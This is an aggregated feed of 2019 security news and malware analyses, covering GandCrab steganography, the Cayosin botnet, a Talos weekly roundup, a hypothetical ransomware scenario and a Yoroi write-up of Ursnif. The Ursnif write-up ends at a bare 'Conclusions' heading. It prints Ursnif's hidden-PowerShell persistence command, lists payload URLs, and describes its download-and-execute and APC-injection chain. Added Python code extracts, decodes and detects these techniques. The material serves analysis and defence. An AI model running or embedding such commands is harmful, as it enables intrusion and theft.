A critical counterfeiting vulnerability addressed in Zcash
New ExileRAT backdoor used in attacks aimed at users in Tibet
Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients
Security expert Marco Ramilli released for free the Malware Hunter tool
Android devices could be hacked by viewing a malicious PNG Image
Expert publicly disclosed the existence of 0day flaw in macOS Mojave
Ursnif: Long Live the Steganography and AtomBombing!
Hackers broke into Australia’s Parliament Computer Network
NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions
Phishing campaign leverages Google Translate as camouflage
Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild
Vulnerabilities in Kunbus Industrial Gateway allows to control the devices
Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem
GandCrab ransomware campaign targets Italy using steganography

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 200 – News of the week appeared first on Security Affairs.

Clipper malware on Play Store replaces users BTC & ETH wallet address

By Waqas

This is the first ever Clipper malware found on Play Store. Another day another Android malware on Google Play Store – This time the IT security researchers at ESET have discovered a malware known for replacing the content of clipboard on the targeted device. This type of malware is called Clipper malware. The malware was targeting Android […]

This is a post from HackRead.com Read the original post: Clipper malware on Play Store replaces users BTC & ETH wallet address

GandCrab ransomware campaign targets Italy using steganography

A newly discovered malware campaign leverages steganography to hide GandCrab ransomware in an apparently innocent Mario image.

Security experts at Bromium have discovered a malware campaign using steganography to hide the GandCrab ransomware in a Mario graphic package.

According to Matthew Rowan, a researcher at Bromium, threat actors use steganography to hide the malicious code and avoid AV detection.

The steganography is used in conjunction with heavily obfuscated Microsoft PowerShell commands that the attackers have hidden within the color channels of a picture of Mario, in particular by manipulating blue and green pixels.

“Steganographic techniques such as using the low-bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack.” reads the analysis published by Rowan.

“A manual re-shuffle to de-obfuscate the code and you can see more clearly the bitwise operation on the blue and green pixels. Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within.”

This technique makes the threat hard to detect for firewalls and other defence systems.
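The low-nibble trick quoted above is easiest to understand by reconstructing the analyst's side of it. The following is an added example, not Bromium's code: the post only says the lower 4 bits of blue and green carry the script, so the exact layout (one payload byte per pixel, high nibble in green, low nibble in blue) is an assumption, pixels are plain (r, g, b) tuples so no imaging library is needed, and the cover image and payload are constructed. It also shows why the picture looks unchanged and how a `strings`-style carve finds the hidden text without knowing its length.

```python
"""Recover and triage data hidden in the low nibbles of green/blue pixels.

Added example, not Bromium's code. The post only says the lower 4 bits of
blue and green carry the script, so this assumes one payload byte per
pixel: high nibble in green, low nibble in blue. Pixels are plain (r, g, b)
tuples so it runs without an imaging library; the cover image and payload
are constructed.
"""
import random


def embed_low_nibbles(pixels, payload):
    """Write payload into the low nibbles; used here only to build the
    constructed sample so the extractor has something to recover."""
    if len(payload) > len(pixels):
        raise ValueError("payload longer than image")
    stego = list(pixels)
    for i, byte in enumerate(payload):
        r, g, b = stego[i]
        stego[i] = (r, (g & 0xF0) | (byte >> 4), (b & 0xF0) | (byte & 0x0F))
    return stego


def extract_low_nibbles(pixels):
    """Rebuild one byte per pixel from the low nibbles of green and blue."""
    return bytes(((g & 0x0F) << 4) | (b & 0x0F) for _r, g, b in pixels)


def _is_text_byte(x):
    return 0x20 <= x < 0x7F or x in (9, 10, 13)


def printable_ratio(data):
    """Share of bytes that are printable ASCII (tab/CR/LF included).
    Natural image noise gives roughly 0.4; embedded script text gives 1.0,
    which is the quickest triage signal for a low-bit plane."""
    if not data:
        return 0.0
    return sum(1 for x in data if _is_text_byte(x)) / len(data)


def carve_printable_runs(data, min_len=8):
    """Like `strings`: return printable ASCII runs of at least min_len bytes,
    which is how an analyst finds the hidden command without knowing its
    length or offset in advance."""
    runs, current = [], bytearray()
    for x in data:
        if _is_text_byte(x):
            current.append(x)
            continue
        if len(current) >= min_len:
            runs.append(current.decode("ascii"))
        current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode("ascii"))
    return runs


def max_channel_change(before, after):
    """Largest per-channel difference between two images; bounded by 15 for
    a low-nibble change, which is why the picture looks unchanged to a human."""
    return max(abs(a - b) for p, q in zip(before, after) for a, b in zip(p, q))


# Constructed cover image: 256 pseudo-random pixels from a fixed seed.
_rng = random.Random(2019)
COVER = [tuple(_rng.randrange(256) for _ in range(3)) for _ in range(256)]
# Constructed, harmless payload standing in for the obfuscated script.
PAYLOAD = b"constructed sample payload hidden in the low nibbles"
STEGO = embed_low_nibbles(COVER, PAYLOAD)

if __name__ == "__main__":
    carved = extract_low_nibbles(STEGO)
    print("max channel change:", max_channel_change(COVER, STEGO))
    print("printable ratio, payload region:", printable_ratio(carved[:len(PAYLOAD)]))
    print("printable ratio, clean cover:", round(printable_ratio(extract_low_nibbles(COVER)), 2))
    for run in carve_printable_runs(carved):
        print("run:", run)
```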

Experts pointed out that attackers are targeting users in Italy, but the campaign will likely extend to other countries worldwide.

“The manually de-obfuscated PowerShell reveals the final level which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example if the culture is Italian, which matches the earlier targeting attempts).” continues the expert.


Experts were able to download the samples from the address in the de-obfuscated PowerShell, including from an Italy-based VPN, and found several samples of the GandCrab ransomware.

Additional details, including IoCs, are reported in the analysis published by the security firm Bromium.

Pierluigi Paganini

(SecurityAffairs – steganography, hacking)


The post GandCrab ransomware campaign targets Italy using steganography appeared first on Security Affairs.

PNG Image File Security Flaw Could Give Hackers Access to Your Android Phone

Most people will get pictures of cute animals and other funny memes sent to them throughout the day. In many

PNG Image File Security Flaw Could Give Hackers Access to Your Android Phone on Latest Hacking News.

Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem

Cayosin Botnet: a deeper look at this threat supported by the psychological profile of the “youngsters-wannabe-hackers” Rolex boasters

Cayosin Botnet

Money, botnet-as-a-service business and coding on the dark side of life: “At this point of my life… if it doesn’t make me money, I don’t make time for it”, is what the threat actor states in the picture below.

Elsewhere the same threat actor makes an even more blatant statement, in a sentence that reads roughly: “I am not scared by the death, I am scared more to not live a pleasant life.”

Cayosin Botnet
Image downloaded by Odisseus
from the Instagram profile of the threat actor

This is the “new” motto of those youngsters-wannabe-hackers: botnet providers, sellers, coders, “boaters” driving through the night with the laptop always connected beside them. In the imaginary world of a teen, the adult world becomes a violent jungle dominated by the dark colors of a delirium of omnipotence. Botnet, packet flooding, bots, attack power: “I don’t care how many and what bots I have, all I care is only to have stable stress power”.

It is in this psychedelic context that the Cayosin botnet has seen the light and has for the first time been reversed and analyzed (the report is here) by “unixfreaxjp” of the MalwareMustDie team.

The analysis is thorough and clear: in the reversed samples there are many traces of a collection of attacks that lead back to a collection of different source codes.

One of them is the Layer 7 (HTTP) attack shown in the picture below, documenting how this kind of malware tries to evade anti-DDoS solutions like Cloudflare.

Cayosin Botnet

From unixfreaxjp’s analysis of the Cayosin binary we can understand that the core of the artifact is the “integration” of different botnet source codes, as is also well documented by reading the now deleted Instagram profile of the 13-year-old scriptbots/unholdable, who implemented this botnet. The STD attack, Tsunami and Christmas DDoS attacks were adapted from the Kaiten botnet, along with more flood combinations taken from Qbot/Lizkebab/Torlus/Gafgyt variants: multiple attack methods integrating multiple source codes in the same artifact, provided “as a service” to other teens or threat actors and sold offhandedly on Instagram. From the Mirai source code Cayosin took the table scheme used to hide the strings the botnet uses to attack the login credentials of vulnerable telnet accounts on known IoT devices, along with other Mirai botnet functionality. Obviously, the coder did not update many features of the C2, which explains why the base protocol of the botnet is still the Qbot/Torlus one.

A ready-to-use botnet built to be sold for $20 a month, “full options” on sale with an expiry token and functionality able to ban the users who didn’t renew the expired “licence”.

The combination of multiple capabilities in the botnet has also been well documented by the PERCH Security Threat Report, which made a great analysis of it, confirming the combination of these functionalities used in Cayosin along with a deeper OSINT investigation of the threat’s source.

The PERCH report states: “Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference”, like the GPON attack that was documented on the Instagram profile of the crew, so clearly that an external observer could easily follow the day-by-day findings of new exploits and methods that were then implemented in the malware to enrich the harmful capability of the new “product”.

They candidly state this in their Instagram Stories: “New Methods, DM me if you want to know more.”

Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

PERCH has understood it well, and in fact writes: “This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.”

At this point it is not excluded that Cayosin is only an evolution of many other botnets made by the same threat actor (or crew), and in particular of the botnet named Messiah. Below is reported the advertising of the Messiah botnet, with features that resemble the Cayosin botnet capabilities. Check the following exclusive image:

  • Features:  Admin of accounts, Add user commands, Kick user commands, Full chat, On line user list, Bot limits for account, Full bot type list, Port Scanner and Resolver
  • Methods: Reg UDP, Reg TCP, STD Hex, CNC Flood, Stomp Flood, Xmas and VSE
  • Replication Exploits: GPON, Telnet, Realtek, Tr064, Huawai

Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

What we learn from the evolution of botnets is the adaptation of source codes: once one bad-actor coder starts to implement something different and other coders find it useful, they adopt the capability by merging source codes. Each coder and botnet provider is racing the others to present their botnet technology as the better one, to attract the market: youngsters and actors interested in renting the best service.

The conclusion is given by the MalwareMustDie team, the group we all know for its years of struggle against botnet coders, through a public tweet showing how this situation can be summarized by a simple fact: “Money”. The veteran DDoS botnet hackers are providing frameworks that keep the DDoS ELF IoT botnet alive as an income engine: from coordinating each type of coder, to linking DDoS-as-a-service sites (known as stressers or bruters) to the botnet control via API, then supplying infrastructure and assisting the newbies with setups; with all this effort these veterans are urging and provoking green and young actors to build their own botnets. The money scheme follows these processes: first taking these youngsters’ “weekly allowance”, then taking credit for the botnets used by the rented “boaters”, and finally making profits from cuts taken case by case through the arrangement of the API used by the bruters/stressers platforms for the attackers who pay for the DDoS service.

In the end, this is all about the money circulation scheme that fuels the existence of the IoT botnets, their coders and the stressers behind them. Disrupting this money flow may give us a chance to disrupt this badness strongly enough to force the scheme to shut down.

Additional glossary:
*) boaters: those who use the rented botnet
*) herders: those who herd botnets
*) stressers or bruters: the front ends of DDoS-as-a-service sites

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

“unixfreaxjp” – member of the MalwareMustDie team.

Pierluigi Paganini

(SecurityAffairs – Cayosin Botnet, cybercrime)


The post Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem appeared first on Security Affairs.


NBlog Feb 8 – inform and motivate

The malware encyclopedia destined for inclusion in our next awareness module is coming along nicely ...

It's interesting to research and fun to write in an informative but more informal style than the glossary, with several decidedly tongue-in-cheek entries so far and a few graphics to break up the text.

I guess it will end up at about 20 pages, longer than usual for a general security awareness briefing but 100% on-topic. There's a lot to say about malware, being such a complex and constantly evolving threat. I hope the relaxed style draws readers in and makes them think more carefully about what they are doing without being too do-goody, too finger-wagging. Prompting changes of attitudes and behaviors is our aim, not just lecturing the troops. Awareness and training is pointless if it's not sufficiently motivational.

Cyber Security Week in Review (Feb. 8)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Attackers continue to utilize a security hole in GoDaddy.com domains. The flaw allows unauthenticated users to send malicious emails via legitimate, dormant domains. Most recently, a group of attackers sent out a series of sextortion and bomb threat emails, as outlined in a report by Cisco Talos. GoDaddy is the world’s largest domain name registrar.
  • Email spammers are taking advantage of a little-known Gmail feature that allows them to grow their reach. They can create so-called “dot emails,” which places a period between each letter in their domain name. If the attackers are able to use a seemingly legitimate domain, they can then add dots to that domain and still control the emails, allowing them to send out more spam. 
  • Facebook is stepping up its crackdown on fake accounts. The social media site took down thousands of pages and profiles posting malicious content. The pages originated from Iran and Indonesia. Earlier this month, it also removed Russian- and Filipino-backed, politically motivated pages.

From Talos


  • An evolution of the LuckyCat malware, known as “ExileRAT,” is targeting Tibetan users. Talos recently discovered an email campaign that sent malicious documents to members of a mailing list related to the Tibetan government-in-exile. Based on the malware’s capabilities, it’s believed the attackers aim to spy on their victims.
  • Cryptocurrency miners, trojans lead malware in 2018. Talos this week published a roundup of the SNORT® rules that triggered the most last year. Rules that helped protect users against miners and trojans were among the most used.

Malware roundup


  • A new backdoor is targeting Linux systems. Known as “SpeakUp,” the remote access trojan allows attackers to gain boot persistence by modifying the local cron utility, run shell commands and execute downloaded files.
  • Banking customers in the U.K. fell victim to SS7 attacks that drained their accounts. Attackers were able to exploit SS7 to intercept users’ phone calls and text messages, eventually being able to steal banking credentials. The U.K.’s Metro Bank was specifically targeted in the most recent campaign. 
  • New variants of DanaBot are targeting users in Europe. Machines already infected with DanaBot received disguised “updates” with the new variants, and attackers also sent out malspam to Polish users. These versions use a different command and control communication method than the original version from 2018. 

The rest of the news


  • Mozilla is working on a new feature for Firefox to protect against side-channel attacks. The new tool aims to be an improved version of Google Chrome’s Site Isolation feature, which helps browsers block potential side-channel attacks.
  • The U.S. Department of Justice and Department of Homeland Security completed an election security report. The study, ordered by the White House, looks at whether the 2018 midterm elections were influenced by foreign interference. It’s unclear whether the report will ever be made public. 
  • Google patched a critical vulnerability in Android devices as part of its February security update. Attackers could use a specially crafted PNG image to completely take over the victim’s mobile device. Google says there’s no evidence of the bug being exploited in the wild.


Bashe: the hypothetical $193 billion ransomware attack

Around the world, hundreds of thousands of employees in thousands of companies receive an email from the company’s payroll department. It contains a PDF attachment with the details of the employees’ end of year bonuses. Some, the more cautious among them, delete the email, sensing that it could be a phishing attack. Others open the attachment, and release the worst cyberattack in history. 43% of the world’s devices are affected, all of their files encrypted. The cost of this attack reaches a staggering $85 billion.

Fortunately, the world is yet to see anything of this kind. However, according to a study by the Cyber Risk Management (CyRiM) project in Singapore, this is a scenario that we could well experience. The investigation was carried out to illustrate the catastrophic consequences that an incident of this type could have on the economy. It describes an advanced ransomware attack, called Bashe, in detail, along with the devastating effects that it could have.

The study describes several scenarios: the “best case”, in which 43% of the world’s devices are encrypted, causing costs of $85 billion; and the “worst case”, where 97% of devices are encrypted, and costs spiral to $193 billion.

Development of a large-scale attack

The study describes how the developers of the ransomware are recruited to create this malware and design the attack. One of the cybercriminals’ goals is to avoid the pitfalls of previous global attacks. As such, the Bashe attack is designed to use a vulnerability without a patch, and efforts are made to ensure that there is no possibility of an online kill-switch being discovered, as happened with WannaCry.

As with so many other malware campaigns, it is delivered inside attachments, in this case a PDF with the subject “Year-End Bonus”. The malware is able to imitate the email domain of the victim, and thus spoof the ‘sent from’ part of the email header. In this way, the email seems to be coming from someone in the victim’s company.

Once the attachment is opened, the malware is executed, downloading the ransomware worm and encrypting all the data on all the computers that share the network with the infected device. It demands a ransom of $700. To make sure the ransomware spreads as far as possible, the worm automatically forwards the malicious email to all the victim’s contacts.

In 24 hours, Bashe has encrypted the data on around 30 million devices all around the world.

Companies start to respond

The study explains that the worst hit industries would be retail, healthcare, and manufacturing. In the retail sector, the costs stem from encrypted payment systems, and the collapse of e-commerce thanks to inoperative websites. The healthcare sector is affected due to its heavy reliance on antiquated systems, just as we saw with the WannaCry attacks. As for manufacturing, the encryption of infrastructure and machines necessary for their activity, along with possible problems in shipping networks, logistics, and inventory would be the main problems caused by this kind of attack.

Many companies rely on IT systems to carry out their day-to-day business; this leads around 8% of them to pay the ransom in order to return to normality as quickly as possible. The criminal organization makes between $1.14 and $2.78 billion this way. Smaller companies are most likely to pay the ransom, given their limited capacity to manage disasters of this kind.

The repercussions

Beyond the economic costs detailed above, one of the most immediate outcomes is an increase in distrust of connected devices, along with stricter controls on the use of corporate email.

Another repercussion of the Bashe attack is a dramatic increase in the demand for IT security. Companies want to protect their corporate networks and their assets in order to avoid similar attacks in the future. Cybersecurity training becomes mandatory for employees, and cyberrisk management courses a requirement in order to get an IT security insurance policy.

How to protect yourself against advanced attacks

Although an attack on the same scale as Bashe is unlikely, any kind of cyberattack can have extremely serious repercussions for a company, regardless of its size:

1.- Employee training. We’ve said it time and time again, but one of the most important steps in protecting against the most advanced cyberthreats is awareness. Companies mustn’t wait until an incident like this one occurs to start to train employees in cybersecurity.

2.- Careful with emails. Email plays a key role in the cataclysmic scenario we’ve just seen. And it is far from being the only kind of threat that uses email as an attack vector. In fact, 87% of IT security professionals have admitted that their company has had to deal with some kind of threat that came via email. If you have even the slightest doubt about where an email has come from, the best course of action is to contact the company’s security team.

3.- Advanced security solutions. An IT security suite such as Panda Adaptive Defense can help to detect any attempted attack that tries to get in via email. It does so by using cognitive intelligence and a real-time detection system. What’s more, it includes a managed Threat Hunting service, which actively searches for the most advanced threats, so that your network is always protected.

The post Bashe: the hypothetical $193 billion ransomware attack appeared first on Panda Security Mediacenter.

NBlog Feb 8 – creative awareness



We're slaving away on the 'malware update' security awareness and training module for March. Malware is such a common and widespread issue that we cover it every year, making it potentially tedious and dull. People soon get bored by the same old notices - not exactly ideal for awareness and training purposes. 

Simply tarting-up and repackaging malware awareness materials we have delivered previously would be relatively easy for us but is not sufficient. Our subscribers deserve more! Aside from needing to reflect today's malware threats and current security approaches, we must find new angles and inject new content each time in order to spark imaginations and engage the audiences, again and again. 

Luckily (in a way), malware is a writhing vipers' pit, constantly morphing as the VXers and antivirus pros do battle on a daily basis. So what's new this year?

The rapid evolution of malware risks is a story worth telling, but how can we actually do that in practice? We favor a strongly visual approach using an animated sequence of Probability Impact Graphs to explain, year-by-year, how specific malware risks have emerged, grown and then mostly faded away as the world gets on top of them. 

It would be great to have the foresight to predict next year's malware PIG, projecting forward from today's, but that's tricky, even for malware experts (which I'm not). The best I can do is pick out a few trends that illustrate the kinds of things we might be facing over the remainder of 2019 ... and perhaps make the point that uncertainty is the very essence of 'risk'. If we knew exactly what to expect, we could of course prepare for it and, better yet, avoid or prevent it happening: we don't, hence we can't, hence we need to be ready for anything, which links neatly back to January's awareness topic of resilience and business continuity, and forward to April's on incident detection. 

And so our cunning strategic plan continues to bear fruit. Although NoticeBored covers different topics every month, they are all part of information security, all in and around the same core area. The approach is quite deliberate: we're poking at the same blob from different directions, exposing and exploring different aspects in order to help our audiences appreciate the whole thing, whilst at the same time avoiding information overload (trying to cover it all at once) and boredom (the blinkered view). Sometimes we take a step back for more of an overview, occasionally we dive deeper into some particular aspect that catches our attention and hopefully intrigues our customers, especially those with relatively mature awareness and training programs. Advanced topics tend to be quite narrow in scope, but even with those we make a conscious effort to link them into the broader context. 

Key words such as 'information', 'risk', 'security', 'control', 'governance' and 'compliance' inevitably crop up in almost every module. Talking of which, we've come up with a new style of awareness material for March, a malware encyclopedia derived from the NoticeBored information security glossary. The full glossary is a substantial piece of work, over 300 pages long, a whole book's worth of content. It's a fantastic reference source for professionals and specialists working in the field, so good in fact that we use it ourselves since remembering all the fine details on more than 2,000 information security terms is beyond us.

I'll have more to say about the encyclopedia tomorrow. For now, must press on, lots to do.

ThreatList: Latest DDoS Trends by the Numbers

Trends in DDoS attacks show an evolution beyond Mirai code and point to next-gen botnets that are better hidden and have a greater level of persistence on devices – making them "far more dangerous."

Ursnif: Long Live the Steganography and AtomBombing!

Yoroi ZLab – Cybaze uncovered a new wave of Ursnif attacks using a variant that implements an exotic process injection technique called AtomBombing

Another wave of Ursnif attacks hits Italy. 
Ursnif is one of the most active banking trojans. It is also known as GOZI, in fact, it is a fork of the original Gozi-ISFB banking Trojan that got its source code leaked in 2014 updating and evolving Gozi features over the years. Also in this variant, Ursnif uses weaponized office document with a VBA macro embedded that act as a dropper and multi-stage highly obfuscated Powershell scripts in order to hide the real payload. In addition, this Ursnif use also steganography to hide the malicious code and avoid AV detection.

Moreover, this variant uses an exotic process injection technique called AtomBombing (through QueueUserAPC), which abuses the Windows atom table to inject into explorer.exe in a stealthier way, because no remote threads are created in the target process.

Technical Analysis

The initial infection vector appears as a corrupted Excel file, inviting the user to enable macro execution to properly view the contents of the fake document, typically purchase order, invoice and so on. 

Figure 1. Ursnif macro-weaponized document.

Extracting the macro code shows that the malware first checks the victim's country using the Application.International MS Office property. If the result corresponds to Italy (code 39), the macro executes the next command using the Shell function.

Figure 2. Part of Visual Basic macro code.

The remaining functions of the macro prepare the shell command to launch, concatenating several strings encoded in different ways (mainly decimal and binary). The resulting command contains a huge binary string, which is converted into a new PowerShell command using:

[Convert]::ToInt16() -as [char]

Figure 3. Powershell script deployed by macro code.

As shown in the above figure, the malware tries to download an image from at least one of two embedded URLs:

  • https://images2.imgbox[.]com/55/c4/rBzwpAzi_o.png
  • https://i.postimg[.]cc/PH6QvFvF/mario.png?dl=1

The apparently legitimate image actually contains a new PowerShell command. The weaponized image is crafted using the Invoke-PSImage script, which embeds the bytes of a script into the pixels of a PNG file. 

Figure 4. Powershell script hidden into “Fancy Mario”’s image.

Et voilà, another obfuscated Powershell stage. The payload is encoded in Base64, so it is easy to move on and reveal the next code.

Figure 5. Another stage of deobfuscation process.

Basically, it appears to be hexadecimal-encoded, which can be decoded with the same [Convert]::ToInt16 function seen earlier (this time with base 16).
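As an added example (not code from the Yoroi/Cybaze analysis or from the malware), the following Python helper reproduces the three decoding steps the analysis lists for an analyst who wants to unwrap such a chain offline: space-separated binary tokens converted as [Convert]::ToInt16(x, 2) -as [char], a Base64 layer, and a hex layer converted as ToInt16(x, 16). The sample input is constructed here by wrapping a harmless stand-in command (the Get-Culture check named later in the analysis) in the same three layers; the layer-detection heuristics and the names peel, identify_layer and build_sample are my own and not from the original scripts.

```python
import base64
import re

# Constructed final stage: a harmless stand-in with the same shape as the
# culture check the analysis describes (not the real script).
FINAL_STAGE = "Get-Culture | Format-List -Property *"

# Outer-layer signatures. Order of checks matters in identify_layer: every hex
# string is also valid Base64, so hex is tested before Base64.
BIN_LAYER = re.compile(r"^[01]{8}(?:[ ,]+[01]{8})*$")
HEX_LAYER = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")
B64_LAYER = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_binary(s):
    """Mirror of: $tokens | % { [Convert]::ToInt16($_, 2) -as [char] }"""
    return "".join(chr(int(tok, 2)) for tok in re.split(r"[ ,]+", s.strip()))


def decode_hex(s):
    """Mirror of [Convert]::ToInt16(pair, 16) -as [char] over consecutive hex pairs."""
    s = s.strip()
    return "".join(chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2))


def decode_b64(s):
    """Base64 layer; PowerShell's -EncodedCommand style uses UTF-16LE text, which
    shows up as a NUL in most odd byte positions, otherwise assume UTF-8."""
    raw = base64.b64decode(s.strip(), validate=True)
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


DECODERS = {"binary": decode_binary, "hex": decode_hex, "base64": decode_b64}


def identify_layer(s):
    """Guess the outermost encoding of a blob, or None when it looks like plain text."""
    t = s.strip()
    if BIN_LAYER.match(t):
        return "binary"
    if HEX_LAYER.match(t):
        return "hex"
    if B64_LAYER.match(t) and len(t) % 4 == 0:
        return "base64"
    return None


def peel(blob, max_layers=8):
    """Strip encoding layers until plain text remains.
    Returns [(kind, decoded_text), ...] from outermost to innermost."""
    layers = []
    current = blob
    for _ in range(max_layers):
        kind = identify_layer(current)
        if kind is None:
            break
        current = DECODERS[kind](current)
        layers.append((kind, current))
    return layers


def build_sample(plain, utf16=False):
    """Wrap plain text the way the analysed chain does, innermost first:
    hex, then Base64, then 8-bit binary tokens. utf16=True mimics the
    -EncodedCommand flavour of Base64 so the UTF-16LE branch is exercised."""
    hex_stage = plain.encode("utf-8").hex()
    b64_input = hex_stage.encode("utf-16-le" if utf16 else "utf-8")
    b64_stage = base64.b64encode(b64_input).decode("ascii")
    return " ".join(format(b, "08b") for b in b64_stage.encode("ascii"))


if __name__ == "__main__":
    sample = build_sample(FINAL_STAGE)
    for depth, (kind, text) in enumerate(peel(sample), 1):
        print(f"layer {depth} ({kind}): {text[:60]}")
```

Running the block on the constructed sample yields three layers (binary, base64, hex) and ends at the stand-in command; on a real capture the analyst feeds the binary string pulled from the macro and reads the innermost layer, which is where the download URLs and the country check sit.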

The final code is:

Figure 6. Powershell script downloading the Ursnif loader.

It executes another check of the victim's country, ensuring it is Italy. The information derives from the command:

Get-Culture | Format-List -Property *

If the check is positive, the script will download an EXE payload from http://fillialopago[.]info/~DF2F63, store it in %TEMP%\Twain001.exe and then execute it.

At analysis time, the file is not detected by most antivirus engines:

Figure 7. Ursnif loader detection rate

Despite its low detection rate, this executable is a classic Ursnif loader, responsible for contacting the server to download the malicious binary that will be injected into the explorer.exe process. It uses the IWebBrowser.Navigate function to download data from its malicious server felipllet[.]info, with a URI path that looks like a path to a video file (.avi).

Figure 8. IWebBrowser.Navigate function invocation.

The server responds to this request by sending encrypted data, as shown in the following figure.

Figure 9. Part of network traffic containing some encrypted data.

After a decryption routine, all useful data is stored into registry keys at HKCU\Software\AppDataLow\Software\Microsoft\{GUID}.

Figure 10. Registry keys set by the malware.

The registry value named “defrdisc” (a name reminiscent of the legitimate Disk Defragmenter utility) contains the command that will be executed as the next step and at Windows startup, as displayed below.

Figure 11. Command executed at machine’s startup.

The command's only goal is to execute the data contained in the “cmiftall” registry value through the PowerShell engine:

C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').cmiftall))"

The “cmiftall” data is simply a hexadecimal-encoded PowerShell script, so it is possible to reconstruct its behavior.
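The persistence command above is a useful hunting pattern on its own: wmic.exe spawning a hidden PowerShell that iex's a registry value under HKCU\Software\AppDataLow. As an added example (not part of the original analysis), here is a small Python scanner that scores process-creation records against those indicators. The log lines are constructed here in a simplified Sysmon Event ID 1 style (ts|image|parent|command_line); the first record reproduces the command from the analysis, the other three are benign activity made up for contrast, and the indicator names and the three-indicator alert threshold are my own choices.

```python
import re

# Constructed process-creation records, one per line: ts|image|parent_image|command_line.
# Record 1 mirrors the persistence command from the analysis (GUID as seen in the report);
# records 2-4 are fabricated benign activity used to show what does NOT alert.
SAMPLE_LOG = r"""2019-02-08T09:12:03|C:\Windows\System32\wbem\WMIC.exe|C:\Windows\explorer.exe|C:\Windows\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').cmiftall))"
2019-02-08T09:15:44|C:\Windows\System32\wbem\WMIC.exe|C:\Windows\System32\cmd.exe|wmic os get caption,version
2019-02-08T09:20:10|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|powershell.exe -NoProfile -File C:\Scripts\inventory.ps1
2019-02-08T09:30:00|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\svchost.exe|powershell.exe -w hidden -File C:\Scripts\nightly-backup.ps1"""

# Each indicator is one behaviour visible in the command line of the analysed sample.
WMIC_CREATE = re.compile(r"process\s+call\s+create", re.I)
HIDDEN_PS = re.compile(r"powershell(?:\.exe)?\b.*?\s-w(?:in(?:dowstyle)?)?\s+hidden\b", re.I)
IEX_FROM_REG = re.compile(r"\b(?:iex|invoke-expression)\b.*\bget-itemproperty\b", re.I)
APPDATALOW_KEY = re.compile(r"HKCU:?\\Software\\AppDataLow\\", re.I)


def indicators_for(image, cmd):
    """Return the list of indicator names that fire for one process-creation record."""
    hits = []
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "wmic.exe" and WMIC_CREATE.search(cmd):
        hits.append("wmic_process_create")      # WMIC used as a LOLBin launcher
    if HIDDEN_PS.search(cmd):
        hits.append("hidden_powershell")        # -w hidden: no console for the user to notice
    if IEX_FROM_REG.search(cmd):
        hits.append("iex_from_registry")        # script body lives in the registry, not on disk
    if APPDATALOW_KEY.search(cmd):
        hits.append("appdatalow_key")           # the storage location used by this family
    return hits


def scan(log_text, threshold=3):
    """Score every record; a record with at least `threshold` indicators is an alert."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, image, parent, cmd = line.split("|", 3)   # maxsplit keeps pipes inside cmd intact
        hits = indicators_for(image, cmd)
        findings.append({"ts": ts, "image": image, "parent": parent,
                         "indicators": hits, "alert": len(hits) >= threshold})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "ALERT " if f["alert"] else "      "
        print(f"{flag}{f['ts']} {f['image'].rsplit(chr(92), 1)[-1]} {f['indicators']}")
```

The threshold is deliberately set so that a lone `-w hidden` (common in legitimate scheduled scripts, as in the fourth record) does not page anyone, while the combination of WMIC launching a hidden PowerShell that evaluates registry content does; in a production rule the AppDataLow path and the `iex`+`get-itemproperty` pairing are the two indicators worth alerting on even in isolation.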

Figure 12. Powershell script used to inject the final binary through the APC Injection technique.

So, using the PowerShell script stored in the registry key (shown above), Ursnif is able to allocate enough space for its malicious byte array containing the final payload and to start it as a thread of a legitimate process through the QueueUserAPC and SleepEx calls.

The Ursnif’s complete workflow is shown in figure:

Figure 13. Ursnif’s workflow.

Finally, from the data contained in the last script's byte array, it is possible to extract a DLL, which corresponds to what Ursnif injects into the explorer.exe process.

This DLL seems to be corrupted, as stated by some static analysis tools:

Figure 14. Info about the malformed DLL.

However, when it is loaded in memory using the APC injection technique, it works with no problems. Submitting the file to VirusTotal, the result is devastating: 0/56 anti-malware engines detect it.

Figure 15. Final DLL’s detection rate.

Conclusions

